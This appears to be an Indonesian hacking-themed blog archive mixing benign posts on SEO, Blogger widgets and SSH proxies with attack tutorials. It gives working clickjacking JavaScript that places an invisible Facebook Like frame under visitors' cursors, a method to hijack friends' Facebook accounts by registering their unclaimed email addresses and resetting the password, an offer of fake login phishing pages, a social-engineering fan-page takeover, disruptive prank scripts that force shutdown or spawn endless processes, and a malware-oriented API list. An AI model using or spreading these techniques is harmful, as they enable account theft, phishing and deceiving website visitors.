$mysite_username = $HTTP_COOKIE_VARS["mysite_username"];

echo “you are logged in as $mysite_username.

“; ?>

8. Fiuuuhhh…akhirnya script yang terakhir yaitu script untuk logout. Script ini dapat dihubungkan dengan link pada html biasa. Link ini diletakkan pada area member. Untuk isi scriptnya dapat anda lihat sbb:

<?php

// expire cookie

setcookie (”loggedin”, “”, time() - 3600);

echo “You are now logged out.<br>”;

echo “<a href=\”login.html\”>Log in</a>.”;

Untuk pengaplikasian dari script-script yang saya jelaskan di atas, dapat anda kreasikan sendiri. Selamat berkreasi.!!!!

Cara Hacking FansPage Facebook

2013-06-13T11:11:00.000+07:00

Sebenarnya untuk hack fan page facebook dapat ditemukan pada website itu. Dan pada setiap website tidak ada yang 100% safe pasti ada celah-celahnya pada website tersebut. Facebook sendiri pun banyak bug yang saya temukan mulai dari bagaimana cara untuk hack facebook seseorang, dan bagaimana hack facebook fan page. Banyak orang yang yang ingin mengambil alih hak dari admin tersebut dan menggunakan hal-hal yang merugikan orang lain.

Setiap fan page pasti akan menampilkan daftar anggota yang telah menyukainya. Tetapi admin sendiri punya pilihan untuk menjadikan admin dari sebuah fan page tersebut. Dengan meteode ini admin bisa menambahkan admin sebanyak admin yang diingkan. Namun admin juga berhak menghapus admin satu dan lainya. Dan dimana admin tersebut dapat berkuasa yang dia inginkan.

Pada halaman tersebut dimana admin bisa menambahkan admin yang baru untuk menjadikan pengurus fan page tersebut. Dan admin yang baru juga bisa menghapus admin yang terdaftar di fan page mereka. Hack fan page akan dimulai dengan metode dibawah ini.

Dengan metode tersebut admin bisa menghapus admin yang terdaftar dan mengambil hak mereka. Jika anda ingin hack fan page seseorang, kemudian suruh admin untuk menambahkan di daftar mereka. Dan caranya terserah anda bagaimana anda bisa membujuk admin untuk bisa menambahakan anda di daftar mereka dan menjadikan sebagai admin. Setelah mereka sudah menjadikan anda sebagai admin dari fan page tersebut, dan kemudian menghapus dia dari daftar admin. Dan anda berhasil menjadi admin fan page tersebut.

Enjoy Hacking...!!! Hacking Itu Sehat :D

Cara Membuat Blog Agar Tampil Di Halaman Pertama Google

2013-06-13T11:06:00.000+07:00

Cara Membuat Blog Agar Tampil Di Halaman Pertama Google

Cara Membuat Blog Agar Tampil Di Halaman Pertama Google. Membuat blog agar tampil di halaman pertama google memang susah” gampang. Kali ini ane mau ngasih sedikit ilmu yang selama ini ane pelajari dari eyang subur dan mbah Google…

Pertama : kita harus membuat blog yang ideal kalau bisa se-Ideal mungkin => Tujuannya biar enak di liat dan di baca sama pengunjung bro !!…coba aja klo blog loe acak –acakan apa lagi sekarang bnyak blog yang g iklanya hampir satu template dipenuhi iklan **** lah teruss… pengunjung mu baca apaan??? Mau klik apaan?? Cumin liatin iklan yang Nora (kalau menurut Gw :D)

Kedua : Keyword atau kata kunciitu nomor satu broo.. kalau loe gak punya kata kunci emang si mbah google mau indek blog loe ???

Ketiga : Postingan, Usahakan Postingan itu murni buatan loe sendiri jangan Copas dari blog orang lain… maksud gw murni itu postingan mana dulu… Gini : “usahakan postingan yang di jadikan kata kunci se-Murni mungkin & cari kata kunci yang blom orang lain buat, dan itu akan menjadi kata kunci blog loe yang paling kuat kalau menurut Eyank subur” …!!! ***

Keempat:

1. Bikin account di Web Master Tool

2. Kudu rajin Ping Blog atau Ping google

3. Cari Traffik dari Media Online yang menurut loe ramee… Misalnya Google+Plus | facebookdll. Caranya dengan membuat halam atau komunitas blog loe ****

4. Join sama pengguna blog lain dan jangan pelit untuk memberikan komentar dan Follow Up

5. Rajin Update Postingan minimal 2 minggu sekali tiap hari lebih bagus tapi postingannya jangankebanyakan copas dari blog orang lain

Kelima : Gunakan RSS FEED yang layak atau yang membuat blog loe di indek sama mbah Google …. FEED BURNER juga gak apa” bagus

Sekian dari gw yang Cupu Soal SEO

Terima kasih sudah membaca artikel saya bagi yang belum membaca semoga cepet membacanya :D

Cara Clickjacking Untuk menambah fans page

2013-06-13T10:44:00.000+07:00

Cara Menambah Fans Halaman Facebook Dengan Otomatis - Clickjacking

Tutorial ini cocok bagi kamu yang ingin punya Fans Page dan Meraup banyak Member, dan pasti yang like Fan Page Kamu sebanyak mungkin....PASTI

Pengertian : Clickjacking adalah teknik menipu pengguna sembarangan Web mengungkapkan informasi rahasia atau mengambil alih komputer mereka sementara mengklik pada halaman Web yang tampaknya tidak berbahaya. Sebuah kerentanan di berbagai browser dan platform, sebuah clickjacking mengambil bentuk kode tertanam atau script yang dapat mengeksekusi tanpa sepengetahuan pengguna, seperti mengklik pada tombol yang muncul untuk melakukan fungsi lain.

Clickjacking ini dimungkinkan karena fitur yang tampaknya tidak berbahaya dari HTML halaman Web dapat digunakan untuk melakukan tindakan tak terduga.

Sebuah trik halaman clickjacked pengguna ke dalam melakukan tindakan yang tidak diinginkan dengan mengklik link tersembunyi. Pada halaman clickjacked, para penyerang menunjukkan serangkaian tombol dummy, lalu load halaman lain di dalam lapisan transparan. Para pengguna berpikir bahwa mereka adalah mengklik tombol terlihat, sedangkan mereka benar-benar melakukan tindakan pada halaman tersembunyi. Halaman tersembunyi mungkin menjadi halaman otentik, dan oleh karena itu penyerang bisa mengelabui pengguna melakukan tindakan yang pengguna tidak pernah dimaksudkan untuk dilakukan dan tidak ada cara untuk melacak tindakan seperti kemudian, ketika pengguna benar-benar dikonfirmasi pada halaman lain.

Sript Auto Like Facebook Fans Page :

Script ini hasil modifikasi saya dari sebuah script yg bernama clickjacking. Tapi tentunya script ini jauh berbeda dengan script clickjacking tersebut. Karna fungsi script clickjacking tentunya hanya mnglike halaman blog kita, BUKAN fans page facebook kita.

Menurut saya fungsi script clickjacking kurang bermanfaat, karna script ini hanya menglike halaman blog kita saja, tapi kalau script yg saya buat lumayan berguna bagi sobat yg ingin fans pagenya mempunyai banyak penggemar. Keuntungan banyak penggemar di fans page yaitu memudahkan kita untuk mempromosikan artikel di blog kita.

Langkah-langkah

Di dalam file zip ini, saya telah memasukan 2 file, yg pertama facebook-script.js dan text cara install ini.

Di dalam file facebook-script.js itu adalah script saya yg masih berisi link like untuk fanspage (halaman facebook) saya.

Download File nya dengan mengklik tombol dibawah ini

Jika Anda ingin menginstal'na di blog / situs Anda, Anda harus merubah isi link yg ada di script saya itu.

Pertama-tama Anda extrak terlebih dahulu file facebook-script.js di folder yg Anda kehendaki. Lalu rename nama file tersebut menjadi facebook-script.txt - Akhiran js di ganti menjadi txt : agar memudahkan kita mengedit isi file js tersebut.

lalu klik 2 kali file js yg sudah di rubah menjadi txt itu, dan cari link fanspage yang ada :

lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://facebook.com/nama-fan-page-kamu') + '&layout=standard&show_faces=true&widt h=53&action=lbox&colorscheme=light&hei ght=80';
(script diatas cuma sample, selengkapnya harus didownload terlebih dahulu)

Jika sudah didownload . Ganti tulisan warna merah tersebut dengan url facebook fan page kamu, dan simpan (save as) dengan nama : jscript.js

Tips : Gunakan "ctrl" + "f" lalu copas link yg berwarna merah agar memudahkan mencari dimana link. Jika sudah ketemu, ganti link itu dengan link fanspage facebook Anda.
Jika sudah di ganti, rename kembali menjadi facebook-script.js
nama file bs sesuka hati kalian, tapi usahakan nama file di beri akhiran "js"
nah sekarang saatnya kalian buka browser (terserah mau mozilla atau exploler) lalu buka alamat:

www.yourjavascript.com

Nah di situlah Anda akan mengupload sript tersebut.
Upload sript Anda dan masukan email Anda.

Email dibutuhkan untuk mengirim kode script yg nantinya akan Anda gunakan (pasang) di blog / situs Anda.

jika Anda telah menerima email dari admin@yourjavascript.com Anda tinggal copy kode tersebut dan Anda paste tepat sebelum tag </body>

contoh kode yg harus di pasang (yg di kirim oleh admin@yourjavascript.com)

<script type="text/javascript" src="http://yourjavascript.com/122128093/facebook-script.js"></script>

Cara kerja script ini sangat mudah, kalian hanya memasang script ini di blog kalian.
Lalu jika ada pengunjung yang mampir ke blog sobat, otomatis si pengunjung akan meng'like fans page facebook yang sobat tentukan sendiri halamannya.
Mudah bukan?

Cara Membuat Slide Show Otomatis Pada Blog

2013-06-13T10:12:00.000+07:00

Cara Membuat Slide Show berdasarkan Label - Cara Membuat Slideshow otomatis - Slideshow memang akan menjadi widget yang bisa memperindah layout template Anda. Pada posting sebelumnya, saya pernah membahas tengan cara membuat slideshow.
dan ini Step By Step Nya :D

Langkah-langkahnya ssebagai berikut:
Login ke blogger.
Klik Design/Tata Letak --> Edit HTML --> centang "Expand Widget Templates"
Backup dulu template anda dengan mengklik "Download Template Lengkap". Untuk berjaga-jaga bila terjadi error. Cari kode : ]]></b:skin>;
    Letakkan kode yang berwarna merah berikut di atas kode ]]></b:skin>;

     #featured{margin-bottom:8px}
    .sliderwrapper{position: relative;overflow: hidden;height: 240px}
    .sliderwrapper .contentdiv{visibility: hidden;position: absolute;left: 0;top: 0;padding: 0px;height: 100%;}
    .pagination{text-align: left;padding:8px 0px}
    .pagination a{font-size:11px;color:#fff;padding: 3px 6px;background:#1b75d6}
    .pagination a:hover, .pagination a.selected{color:#dedde5;background-color:#535352}
    .featuredPost{width:360px;padding:10px 10px 0;background:#191919;filter:alpha(opacity=75);-moz-opacity:.75;opacity:.75;color:#dedde5;position:absolute;bottom:0}
    .featuredPost a{color:#fff}
    .featuredPost a:hover{color:#dedde5}
    .featuredPost h2{margin:0;font-size:12px;line-height:1}
    .featuredPost span{font-size:10px}
    .featuredPost p{font-size:11px}

    Masih dalam dalam posisi Edit HTML. Cari kode </head>
    Sekarang letakkan kode berwarna biru berikut ini di atas kode </head>

    <script>
    //<![CDATA[
    /* Script from:http://simplexdesign.blogspot.com/ */
    imgr = new Array();
    imgr[0] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpI1J4LUADciOIiGwk2vqYyxWCg7w-bKbSs6TOu-i7C9vRrfYj3LjCK_7GDWTLD_tt001LgzL3aFjFTvzWvv6R-KmP12LwFJuicqNJA92wQ1YwMr2vWxHHLLmumxg70j7EHB6tytjPtic/s1600/no+image.jpg";
    showRandomImg = true;
    aBold = true;
    summaryPost = 100;

    numposts1 = 5;
    label1 = "Blog";

    function removeHtmlTag(strx,chop){var s=strx.split("<");for(var i=0;i<s.length;i++){if(s[i].indexOf(">")!=-1){s[i]=s[i].substring(s[i].indexOf(">")+1,s[i].length)}}s=s.join("");s=s.substring(0,chop-1);return s}

    function showrecentposts1(json){j=(showRandomImg)?Math.floor((imgr.length+1)*Math.random()):0;img=new Array();for(var i=0;i<numposts1;i++){var entry=json.feed.entry[i];var posttitle=entry.title.$t;var pcm;var posturl;if(i==json.feed.entry.length)break;for(var k=0;k<entry.link.length;k++){if(entry.link[k].rel=='alternate'){posturl=entry.link[k].href;break}}for(var k=0;k<entry.link.length;k++){if(entry.link[k].rel=='replies'&&entry.link[k].type=='text/html'){pcm=entry.link[k].title.split("")[0];break}}

    if ("content" in entry) {
    var postcontent = entry.content.$t;}
    else
    if ("summary" in entry) {
    var postcontent = entry.summary.$t;}
    else var postcontent = "";
    postdate = entry.published.$t;
    if(j>imgr.length-1) j=0;
    img[i] = imgr[j];
    s = postcontent    ; a = s.indexOf("<img"); b = s.indexOf("src=\"",a); c = s.indexOf("\"",b+5); d = s.substr(b+5,c-b-5);
    if((a!=-1)&&(b!=-1)&&(c!=-1)&&(d!="")) img[i] = d;

    var month=[1,2,3,4,5,6,7,8,9,10,11,12];var month2=["January","February","March","April","May","Juny","July","August","September","October","November","December"];var day=postdate.split("-")[2].substring(0,2);var m=postdate.split("-")[1];var y=postdate.split("-")[0];for(var u2=0;u2<month.length;u2++){if(parseInt(m)==month[u2]){m=month2[u2];break;
    }}

    var daystr = day+ ' ' + m + ' ' + y ;
    var trtd = '<div class="contentdiv">
<div class="sliderPostPhoto">
<a href="'+posturl+'"><img width="370" height="240" class="alignnone" src="'+img[i]+'"/></a><div class="sliderPostInfo">
</div>
</div>
<div class="featuredPost">
<h2>
<a href="'+posturl+'">'+posttitle+'</a></h2>
<span>'+daystr+'</span><p>
'+removeHtmlTag(postcontent,summaryPost)+'...</p>
</div>
</div>
';
    document.write(trtd);
    j++;
    }}
    //]]>
    </script>

Perhatikan kode yang di beri huruf tebal label1 = "Blog". Itu adalah label atau kategori yang akan ditampilkan di slider, di sini dipilih label berita. Anda nanti tinggal mengganti dengan label yang diinginkan. Perhatikan juga kode img width="370" height="240" itu adalah lebar dan tinggi slider, silahkan sesuaikan dengan template Anda.

    Kemudian, cari kode </body>
    Letakkan kode berwarna ornge di bawah ini sebelum kode </body>

    <script src="http://dl.dropbox.com/u/12924430/contentslider.js">
    <script>
    //<![CDATA[
    featuredcontentslider.init({
    id: "slider1", //id of main slider DIV
    contentsource: ["inline", ""], //Valid values: ["inline", ""] or ["ajax", "path_to_file"]
    toc: "#increment", //Valid values: "#increment", "markup", ["label1", "label2", etc]
    nextprev: ["Previous", "Next"], //labels for "prev" and "next" links. Set to "" to hide.
    enablefade: [true, 0.5], //[true/false, fadedegree]
    autorotate: [true, 6000], //[true/false, pausetime]
    onChange: function(previndex, curindex){ //event handler fired whenever script changes slide
    //previndex holds index of last slide viewed b4 current (1=1st slide, 2nd=2nd etc)
    //curindex holds index of currently shown slide (1=1st slide, 2nd=2nd etc)
    }
    })
    //]]>
    </script>

    Kemudian, cari kode <br />
<div id="main-wrapper">
, jika anda ingin slider tampil di atas main-wrapper seperti pada demo, dan letakkan kode berikut di bawahnya :

    <b:if cond="data:blog.pageType == "index"">
    </b:if><br />
<div id="featured">
<div class="sliderwrapper" id="slider1">
<script>
    document.write("<script src=\"/feeds/posts/default/-/"+label1+"?max-results="+numposts1+"&orderby=published&alt=json-in-script&callback=showrecentposts1\"><\/script>");
    </script>
    </div>
<div class="pagination" id="paginate-slider1">
</div>
</div>

Cara mengubah tampilan win 8

2013-06-13T10:01:00.000+07:00

Nah windows 8 anda sudah permanen? jika sudah permanen pastinya anda ingin mengubah start menu windows 8 anda lebih menarik sesuai dengan yang anda inginkan solusi berikut bisa anda ikuti langkah-langkahnya:

1. Download dulu softwarenya link berikut DOWNLOAD.rar
2. Nah setelah dapet software extrak dulu
3. Setelah diextrak klik softwarenya maka akan muncul gambar seperti dibawah ini :

4. Atur gambar yang anda inginkan dengan klik Load Picture masukkan gambar yang ingin anda tampilkan di menu start windows 8, atur gambar yang akan diambil lalu klik Apply & Save.

Semoga bermanfaat.

Cara Menggunakan Bitvise SSH Client

2013-06-13T09:38:00.000+07:00

Cara Menggunakan Bitvise SSH Client Dan Step By Step

Disini saya hanya ingin memberikan tutorial bagaimana cara menggunakan software Bitvise SSH Client. Dulu saya pun pernah mengalami masalah / tidak bisa dalam menggunakan software ini, dengan bantuan Google akhirnya saya berhasil menggunakannya.
Sebelum menggunakannya, tentu harus anda install terlebih dahulu.
Pertama : Download dan Install.
Download softwarenya di situs resminya saja, untuk menghindari virus-virus maho. Cek di sini
Dan install seperti software biasanya.
Kedua : Cara Pakai.
Jalankan aplikasinya maka anda akan melihat tampilan seperti di bawah ini.

Keterangan :

Isi host dengan IP VPS atau hostname yang sudah diarahkan ke IP VPS. disini saya menggunakan HOST : s1.esteh.info dan juga isi portnya.
kolom username isi dengan username yang kalian miliki, disini saya menggunakan root. Jangan lupa Initial Method diubah menjadi password, lalu isikan passwordnya
Klik tombol login sampai muncul tulisan succeded, kalau tulisannya hanya sampai completed maka anda harus mengikuti langkah ke 4
Klik tab Service kemudian centang enable yang ada dibawah sock/HTTP proxy forwading, setelah itu relogin, yang perlu diperhatikan disini adalah mengisi listen interface dan listen port. Isikan saja sepeti digambar. port inilah yang akan kita arahkan untuk mengoper koneksi dari Bitvise SSH client ke Proxifier atau langsung ditancap di mozilla.

Sekoian Dari Saya Dan Trimakasih :D

Fake Login Twitter Dan Facebook

2013-06-12T21:21:00.000+07:00

Nih, buat agan-agan yang suka ngejebak temen-temennya pake Fake Login. Ane sediain dengan full package, jadi kalau ada perubahan dari tampilan Twitter sama Facebook nya, Fake login ini tidak akan berubah :) Silah kan nikmati Dan Download ya :D

Facebook

Twitter

Cara Membuat Tombol Like Facebook

2013-06-12T21:20:00.000+07:00

Selamat malam sobat Hack4rt, malam ini Hack4rt akan memberikan sebuah tutorial mungkin Hacking. Sebuah tutorial cara membuat clickjacking di blog. ClickJacking ini membuat pengunjung tidak melihat ada tombol Like Facebook berada tepat di mouse sang pengunjung blog. Jadi saat menekan link, sang pengunjung blog sebenarnya sedang mengklik tombol like Facebook kita. Jadi ga perlu repot-repot nyari Like di FansPage Facebook kita. Yaudah langsung aja ke tutorial di blog

1. Membuat Gadget HTML/Javascript
2. Isikan Kode berikut

<script type="text/javascript">
(function(){

var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;

if (!IE) document.captureEvents(Event.MOUSEMOVE);

var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/kuntillepascom') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80';
lbox.scrolling = 'no';
lbox.frameBorder = 0;
lbox.allowTransparency = 'true';
lbox.style.border = 0;
lbox.style.overflow = 'hidden';
lbox.style.cursor = 'pointer';
lbox.style.width = '53px';
lbox.style.height = '23px';
lbox.style.position = 'absolute';
lbox.style.opacity = 0;
document.getElementsByTagName('body')[0].appendChild(lbox);

window.addEventListener('mousemove', mouseMove, false);

setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
}, 16000);

function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }

    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;

    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';

    return true
}
})();

</script>

Nah untuk kata yang berwarna merah ganti dengan alamat fanspage facebook kamu. Dan yang berwarna biru ganti dengan lama waktu muncul tombol like nya

3. Simpan
4. Selesai

Terimakasih :)

Hacking Facebook Terbaru 2013

2013-06-12T21:17:00.000+07:00

Hacking, merupakan sebuah perbuatan seorang hacker yang bisa mendapatkan beberapa hak akses kepada sesuatu yang ia inginkan dengan cara yang ilegal. Hacking ini sangat digemari oleh para pengguna Facebook untuk mendapatkan hak akses memasuki akun Facebook temannya dengan beberapa tujuan, ada yang hanya sekedar iseng, balas dendam bahkan hanya ingin showoff. Banyak sekali tutorial Hacking yang pernah saya bahas di blog ini. Diantara tutorial Hacking Facebook ada yang masih bisa digunakan yaitu dengan menggunakan Forgot Password dan Fake Login. Kali ini Hack4rt akan memberikan tutorial Hacking Faceook dengan menggunakan TRIK campuran antara kelemahan si user dengan forgot password. Berikut tutorial Hacking Facebook yang Hack4rt dapatkan dari mywapblog cahyadi-nata.

Import Contact from Yahoo Mail!
Disini kita akan menyaring semua email yang terdapat pada akun facebook teman kita. Jadi, kita akan melihat semua email yang digunakkan oleh teman kita untuk login ke facebook.
1. Login ke akun Yahoo yang kamu miliki
2. Klik import email dan pilih yang bergambar Facebook
3. Setelah muncul semua email teman Facebook kamu, pilihlah salah satu email Yahoo yang ada di deretan tersebut

Forgot Facebook Password - 1
Disini kita akan menggunakan email yahoo yang kita dapatkan dari imports contact Yahoo untuk berpura-pura sebagai user yang lupa akan password akun Facebook.
1. Pergilah ke forgot password Facebook, atau klik disini
2. Silahkan masukkan email korban yang kita dapatkan dari Yahoo imports contact
3. Lalu klik saya tidak mempunyai akses ke sini lagi? Lihat gambar

Akan terdapat 2 kondisi setelah langkah 3 dilakukan, yang pertama kita diperintahkan untuk memasukkan email baru dan yang kedua yaitu terjadi error. Jika terjadi error maka email tersebut belom diverifikasi bahkan tidak terdaftar dalam Yahoo! Mail. Jika terjadi error lanjut ke langkah 4. Jika tidak terjadi error anda bisa lanjutkan dengan teknik Forgot Password yang ini.

4. Karena terjadi error, mungkin email tidak terverifikasi atau tidak pernah dibuat di Yahoo, inilah kesalahan user Facebook yang membuat akun Facebook tanpa email yang diverifikasi atau email yang tidak terdaftar dalam Yahoo Mail. to be continue...

Create 'Your' Yahoo Account!
Jika alamat Yahoo korban yang dijadikan untuk login Facebook tidak terdaftar dalam akun Yahoo, maka... BUATKANLAH DIA AKUN YAHOO! Buat lah sebuah email di yahoo dengan alamat korban yang anda dapatkan di imports contact Yahoo anda tadi atau yang anda masukkan dalam forgot password tadi. Kalau anda sudah membuat emailnya, maka anda adalah sama dengan yang punya akun facebook tersebut!

Forgot Facebook Password - 2
Apa yang anda harus lakukan jika anda lupa dengan password akun Facebook anda? Anda akan meminta password yang baru dengan cara seperti Forgot Facebook Password - 1 di atas. Hanya saja pada langkah ketiga kita ganti dengan mengklik Atur Ulang Kata Sandi. Setelah itu silahkan buka email yang baru kita buat, selamat anda menerima link untuk membuat kata sandi Facebook korban :)

Trik ini saya dapatkan dari mywapblog-nya cahyadi-nata dan belum pernah saya coba dengan tangan saya sendiri, karena ada beberapa hal... Saya hanya seorang blogger, saya tidak ingin lagi meretas akun Facebook teman saya dan trik tersebut saya anggap logis, karena trik tersebut memanfaatkan kelalaian user yang tidak memverifikasi emailnya dan bahkan tidak memakai email yang valid atau tidak terdaftar dalam Yahoo mail. Terimakasih atas visitnya, ada yang ingin ditanyakan? mungkin tidak semua saya jawab karena saya belum pernah mencoba trik ini :)

Kumpulan Scipt Jail Untuk Ngerjani Teman

2013-06-12T21:13:00.000+07:00

Gak perlu basa-basi deh. Kali ini saya share script jahil untuk ngerjain komputer teman kalian. Mungkin sudah ada yang tau cara ini atau sudah pernah lihat di blog lain. Jadi, yang sudah tau cara ini silahkan baca artikel lainnya dan untuk yang belum tahu lansung lanjut ke TKP.

Berikut adalah cara membuat script jahil dengan menggunakan Notepad. Silahkan buka program Notepad kemudian copy dan paste salah satu kode di bawah ini, kemudian simpan dengan format yang dijelaskan di bawah.

1. Membuat pesan muncul berulang kali

@ECHO off
:Begin
msg * Pesan 1
msg * Pesan 2
msg * Pesan 3
msg * Pesan 4
msg * Pesan 5
GOTO BEGIN

Simpan dengan format *.bat

2. Membuka dan menutup CD/DVD komputer otomatis

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count >= 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count >= 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan dengan format *.vbs

3. Menulis otomatis di Notepad

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Tulis pesan di sini"
loop

Simpan dengan format *.vbs

4. Shutdown komputer disertai pesan

@echo off

msg * Tunggu sebentar ya
shutdown -s -c "Komputer kamu akan mati"

Simpan dengan format *.bat

5. Tombol Caps Lock nyala terus

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan dengan format *.vbs

6. Menekan tombol Backspace secar terus menerus

MsgBox "Kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan dengan format *.vbs

7. Membuka program Notepad terus menerus

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan dengan format *.bat

8. Membuat lampu disko di keyboard

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

Simpan dengan format *.vbs

Demikianlah beberapa script jahil sekedar untuk berbuat usil pada komputer teman. Selamat mencoba!.

Kumpulan Fungsi winAPI Dan Malware

2013-06-12T21:12:00.000+07:00

Fungsi winAPI Dan Malware

Virus, Worm, Trojan, Spyware dan sebagainya yang termasuk kategori Malware atau malicious software mungkin sering kita temui dalam aktivitas berkomputer sehari-hari menyebalkan memang jika menemukannya dalam sistem kita [atau memang sengaja di ternak karena hobi?], tapi bagi anda yang tertarik dengan malware atau ingin membuatnya, berikut daftar beberapa fungsi-fungsi API yang sering dipakai oleh malware dalam aksinya beserta Link referensi dari MSDN. yang tentunya lengkap dengan syntak yg digunakan dan parameter yang dipakai pada setiap fungsinya.

Catatan: beberapa fungsi API dibawah ini, ada kemungkinan juga dipakai pada software biasa.
Fungsi-Fungsi Yang Digunakan Malware
——————–
GetWindowsDirectory
——————–
Mendapatkan path lengkap direktori windows,sehingga malware bisa mengcopy dirinya
sendiri ke direktori windows
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724454(v=vs.85).aspx
———-
RegOpenKey
———-
Fungsi untuk Membuka key registri untuk dibaca dan dimanipulasi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724895(v=vs.85).aspx
—————-
GetAsyncKeyState
—————-
Digunakan untuk menentukan apakah key atau tombol tertentu sedang ditekan. Malware
yang menggunakan fungsi ini disebut sebagai keylogger [perekam ketikkan].
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293(v=vs.85).aspx
————-
GetHostByName
————-
Digunakan untuk melakukan lookup DNS pada host tertentu sebelum membuat
koneksi IP ke host remote.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738524(v=vs.85).aspx
———–
GetHostName
———–
Mengambil nama host dari komputer. Malware menggunakan gethostname sebagai bagian dari pencurian
informasi dari korban.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738527(v=vs.85).aspx
———–
GetKeyState
———–
Digunakan oleh keylogger untuk mendapatkan status key tertentu pada keyboard.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646301(v=vs.85).aspx
—————–
GetModuleFileName
—————–
Mendapatkan nama file secara lengkap dari sebuah modul yang dimuat dalam proses saat ini.
Malware dapat menggunakan fungsi ini untuk memodifikasi atau menyalin file di saat menjalankan proses.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683197(v=vs.85).aspx
————————
CreateToolhelp32Snapshot
————————
Digunakan untuk membuat snapshot dari proses yang sedang berjalan berikut module atau thread pada proses tersebut
Malware sering menggunakan fungsi ini untuk memonitoring apa ada proses yang membahayakan dirinya,
sehingga malware dapat men-terminatenya dan lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682489(v=vs.85).aspx
————
ShellExecute
————
Digunakan untuk mengeksekusi program lain
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx
—————–
URLDownloadToFile
——————
untuk men-download file dari server web dan menyimpannya ke dalam harddisk.
malware yang menggunakan fungsi ini dikenal sebagai downloader
Link : http://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx
————
GetVersionEx
————
Mendapatkan informasi tentang versi Windows yangsedang digunakan.
Hal ini dapat digunakan sebagai bagian dari pncurian informasi korban atau untuk mengatur
fungsi mana yang cocok diterapkan untuk korban
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
————–
GetProcAddress
————–
Mengambil address dari suatu fungsi dalam DLL yang telah dimuat ke memori. Digunakan untuk
mengimpor fungsi dari DLL lain selain fungsi yang telah diimpor dalam file header PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
—————————-
Process32First/Process32Next
—————————-
Digunakan untuk memulai proses pencarian dari panggilan sebelumnya yaituCreateToolhelp32Snapshot.
untuk menemukan suatu proses tertentu untuk proses injeksi atau terminate
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684834(v=vs.85).aspx
———–
OpenProcess
———–
Membuka handle untuk proses lain yang berjalan pada sistem.handle ini
dapat digunakan untuk membaca dan menulis ke memori proses lain atau untuk menginjeksi
kode ke proses lainnya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684320(v=vs.85).aspx
————–
RegisterHotKey
————–
Digunakan untuk mendaftarkan handle untuk diberitahu kapan saja korban memasukkan tertentu
kombinasi tombol (seperti CTRL+ALT+Y),
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646309(v=vs.85).aspx
—————————–
FindFirstFile / FindNextFile
—————————–
Digunakan untuk mencari sebuah file melalui direktori yang cocok dengan nama atau kondisi tertentu
dan bisa juga untuk menghitung atau mengkalkulasi file yang akan dijadikan target infeksi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364418(v=vs.85).aspx
————-
FindResource
————-
Digunakan untuk menemukan sumber daya/resource dalam sebuah DLL yang dieksekusi atau telah dimuat,
Malware menggunakan resource untuk menyimpan string, informasi konfigurasi, atau file berbahaya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648042(v=vs.85).aspx
————
LoadResource
————
mengeluarkan resource dari sebuah file PE ke dalam memori. Malware kadang-kadang menggunakan
resource untuk menyimpan string, konfigurasi informasi, atau muatan berbahaya lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648046(v=vs.85).aspx
———-
FindWindow
———-
digunakan untuk mencocokan nama window dari sebuah proses dengan list atau string tertentu
misal jika ditemukan nama window dari AV yang bernama AntiVirus maka malware akan berusaha
mn-terminate proses AV tersebut
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx
———–
GetTempPath
———–
Mendapatkan path file sementara yang dibuat atau akan dibuat.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364992(v=vs.85).aspx
—————-
SetWindowsHookEx
—————-
Menetapkan fungsi hook yang akan dijalankan setiap kali suatu event tertentu dipanggil.
Umumnya digunakan dengan keyloggers dan spyware,
